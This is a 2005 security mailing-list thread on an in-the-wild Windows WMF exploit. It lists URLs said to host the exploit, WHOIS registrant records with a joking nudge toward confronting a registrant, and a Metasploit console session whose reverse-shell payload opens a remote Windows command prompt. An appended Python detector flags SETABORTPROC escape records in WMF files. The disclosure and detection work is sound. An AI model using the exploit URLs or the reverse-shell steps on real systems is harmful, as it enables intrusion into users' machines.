
RE: [Full-disclosure] Someone wasted a nice bug on spyware...



Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
sent it to Microsoft a few days ago and they're looking into it. It looks
like it's going to be a bad week at MSRC :(

I whoised the owners of a couple domains who host the image and got the
following information:

Domain Name:                                 BEEHAPPYY.BIZ
Domain ID:                                   D9564716-BIZ
Sponsoring Registrar:                        ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID:                82
Domain Status:                               ok
Registrant ID:                               OLNIC_919328_0_0
Registrant Name:                             Mikhail Sergeevich Gorbachev
Registrant Organization:                     Mikhail Sergeevich Gorbachev
Registrant Address1:                         Krasnaya ploshad, 1
Registrant City:                             Moscow
Registrant State/Province:                   Moscow
Registrant Postal Code:                      176098
Registrant Country:                          Russian Federation
Registrant Country Code:                     RU
Registrant Phone Number:                     +7.0957643453
Registrant Facsimile Number:                 +7.0957643453
Registrant Email:                            mail@xxxxxxxxxxxx
Administrative Contact ID:                   OLNIC_919328_1_0
Administrative Contact Name:                 Mikhail Sergeevich Gorbachev
Administrative Contact Organization:         Mikhail Sergeevich Gorbachev
Administrative Contact Address1:             Krasnaya ploshad, 1
Administrative Contact City:                 Moscow
Administrative Contact State/Province:       Moscow
Administrative Contact Postal Code:          176098
Administrative Contact Country:              Russian Federation
Administrative Contact Country Code:         RU
Administrative Contact Phone Number:         +7.0957643453
Administrative Contact Facsimile Number:     +7.0957643453
Administrative Contact Email:                mail@xxxxxxxxxxxx
Billing Contact ID:                          OLNIC_919328_3_0
Billing Contact Name:                        Mikhail Sergeevich Gorbachev
Billing Contact Organization:                Mikhail Sergeevich Gorbachev
Billing Contact Address1:                    Krasnaya ploshad, 1
Billing Contact City:                        Moscow
Billing Contact State/Province:              Moscow
Billing Contact Postal Code:                 176098
Billing Contact Country:                     Russian Federation
Billing Contact Country Code:                RU
Billing Contact Phone Number:                +7.0957643453
Billing Contact Facsimile Number:            +7.0957643453
Billing Contact Email:                       mail@xxxxxxxxxxxx
Technical Contact ID:                        OLNIC_919328_2_0
Technical Contact Name:                      Mikhail Sergeevich Gorbachev
Technical Contact Organization:              Mikhail Sergeevich Gorbachev
Technical Contact Address1:                  Krasnaya ploshad, 1
Technical Contact City:                      Moscow
Technical Contact State/Province:            Moscow
Technical Contact Postal Code:               176098
Technical Contact Country:                   Russian Federation
Technical Contact Country Code:              RU
Technical Contact Phone Number:              +7.0957643453
Technical Contact Facsimile Number:          +7.0957643453
Technical Contact Email:                     mail@xxxxxxxxxxxx
Name Server:                                 NS1.PERLINK.BIZ
Name Server:                                 NS2.PERLINK.BIZ
Created by Registrar:                        ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar:                   ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date:                    Tue Apr 26 15:43:16 GMT 2005
Domain Expiration Date:                      Wed Apr 25 23:59:59 GMT 2007
Domain Last Updated Date:                    Thu Aug 11 02:33:14 GMT 2005


The name Mikhail Sergeevich Gorbachev that this domain is registered to
leads me to believe that it is registered with false information (for those
of you who don't know, Gorbachev was a former Soviet president).


Domain Name:                                 BUYTOOLBAR.BIZ
Domain ID:                                   D11475548-BIZ
Sponsoring Registrar:                        TLDS INC.
Sponsoring Registrar IANA ID:                320
Domain Status:                               clientTransferProhibited
Registrant ID:                               6464084-SRSPLUS
Registrant Name:                             Ezhi Brozkevitsh
Registrant Organization:                     Ezhi Brozkevitsh
Registrant Address1:                         Al. Armii Ludowej 24
Registrant City:                             Warszawa
Registrant Postal Code:                      00-609
Registrant Country:                          Poland
Registrant Country Code:                     PL
Registrant Phone Number:                     +21.225798400
Registrant Email:                            admin@xxxxxxxxxxxx
Administrative Contact ID:                   6464085-SRSPLUS
Administrative Contact Name:                 Ezhi Brozkevitsh
Administrative Contact Organization:         Ezhi Brozkevitsh
Administrative Contact Address1:             Al. Armii Ludowej 24
Administrative Contact City:                 Warszawa
Administrative Contact Postal Code:          00-609
Administrative Contact Country:              Poland
Administrative Contact Country Code:         PL
Administrative Contact Phone Number:         +21.225798400
Administrative Contact Email:                admin@xxxxxxxxxxxx
Billing Contact ID:                          6464085-SRSPLUS
Billing Contact Name:                        Ezhi Brozkevitsh
Billing Contact Organization:                Ezhi Brozkevitsh
Billing Contact Address1:                    Al. Armii Ludowej 24
Billing Contact City:                        Warszawa
Billing Contact Postal Code:                 00-609
Billing Contact Country:                     Poland
Billing Contact Country Code:                PL
Billing Contact Phone Number:                +21.225798400
Billing Contact Email:                       admin@xxxxxxxxxxxx
Technical Contact ID:                        6464086-SRSPLUS
Technical Contact Name:                      Ezhi Brozkevitsh
Technical Contact Organization:              Ezhi Brozkevitsh
Technical Contact Address1:                  Al. Armii Ludowej 24
Technical Contact City:                      Warszawa
Technical Contact Postal Code:               00-609
Technical Contact Country:                   Poland
Technical Contact Country Code:              PL
Technical Contact Phone Number:              +21.225798400
Technical Contact Email:                     admin@xxxxxxxxxxxx
Name Server:                                 NS1.BUYTOOLBAR.BIZ
Name Server:                                 NS2.BUYTOOLBAR.BIZ
Created by Registrar:                        TLDS INC.
Last Updated by Registrar:                   TLDS INC.
Domain Registration Date:                    Mon Nov 14 08:00:27 GMT 2005
Domain Expiration Date:                      Mon Nov 13 23:59:59 GMT 2006
Domain Last Updated Date:                    Mon Nov 14 11:16:52 GMT 2005

This information does look promising. Iframeurl.biz is also registered to
the same individual. Perhaps the Polish authorities could apprehend this
culprit (either that, or a Polish reader of full-disclosure could pay him a
visit ;). That is, of course, assuming he is stupid enough to use his real
name to register a domain for illegal use. 


Regards,
Paul
Greyhats Security
http://greyhatsecurity.org




-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of Eric Sites
Sent: Tuesday, December 27, 2005 11:02 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware...

We are seeing a lot of websites picking this exploit up.

Examples: DON'T CLICK

Crackz.ws
unionseek.com/d/t1/wmf_exp.htm
beehappyy.biz/parthner3/xpl.wmf
http://www.tfcco.com/xpl.wmf
Iframeurl.biz

Cheers,

Eric Sites 
VP of Research & Development
Sunbelt Software

email: eric@xxxxxxxxxxxxxxxxxxxx 
Voice: 1-727-562-0101 x 276
Cell: 1-727-637-2414
Fax: 1-727-562-5199
Web: http://www.sunbelt-software.com
Physical Address:
101 N Garden Ave, 
Suite 120
Clearwater, FL, 33755
United States

-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of H D Moore
Sent: Tuesday, December 27, 2005 10:57 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Someone wasted a nice bug on spyware...

In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>  


On Tuesday 27 December 2005 14:20, noemailpls@xxxxxxxxxxxxx wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
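A defender-side check for .wmf files like the ones listed in this thread, added here as an example; it is not part of the thread, the Metasploit module, or any poster's code. It walks the WMF record stream and flags a META_ESCAPE record carrying the SETABORTPROC escape function, the well-known trigger for this bug (a detail the thread itself does not spell out); the sample files it scans are constructed inline.

```python
"""Flag WMF files carrying a META_ESCAPE/SETABORTPROC record (detection only)."""
import struct

PLACEABLE_MAGIC = 0x9AC6CDD7   # optional 22-byte "placeable" header
META_ESCAPE = 0x0626           # standard record function code
META_EOF = 0x0000
META_SETMAPMODE = 0x0103       # harmless record used in the constructed samples
SETABORTPROC = 0x0009          # escape sub-function this bug abused


def wmf_findings(data: bytes) -> list:
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC:
        off = 22                                   # skip the placeable header
    if len(data) < off + 18:
        return ["truncated: no META_HEADER"]
    typ, hdr_words, _version = struct.unpack_from("<HHH", data, off)
    if typ not in (1, 2) or hdr_words != 9:       # 1 = memory, 2 = disk; header is 9 words
        findings.append(f"unusual header: type={typ} size_words={hdr_words}")
    off += 18
    rec = 0
    while off + 6 <= len(data):                    # RecordSize (4 bytes) + RecordFunction (2)
        size_words, func = struct.unpack_from("<IH", data, off)
        rec += 1
        if func == META_EOF:
            break
        # Match on the low byte only: GDI was reported to dispatch on it alone,
        # so 0x0026 behaves like 0x0626 (assumption noted in the lead-in).
        if (func & 0xFF) == (META_ESCAPE & 0xFF) and off + 8 <= len(data):
            escape_func = struct.unpack_from("<H", data, off + 6)[0]
            if escape_func == SETABORTPROC:
                findings.append(f"record {rec} @ {off}: META_ESCAPE/SETABORTPROC "
                                f"(func=0x{func:04x}, size_words={size_words})")
        if size_words < 3:                         # size covers itself + function: >= 3 words
            findings.append(f"record {rec} @ {off}: bogus RecordSize {size_words}; stopping walk")
            break
        off += size_words * 2
    return findings


def build_sample(abortproc: bool, func: int = META_ESCAPE) -> bytes:
    """Constructed minimal WMF: header, one benign record, optional escape record, EOF."""
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, 0, 0, 0, 0)   # sizes left 0 for brevity
    body = struct.pack("<IHH", 4, META_SETMAPMODE, 8)             # MM_ANISOTROPIC
    if abortproc:
        body += struct.pack("<IHHH", 6, func, SETABORTPROC, 2) + b"\x00\x00"  # 2 data bytes
    return header + body + struct.pack("<IH", 3, META_EOF)
```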
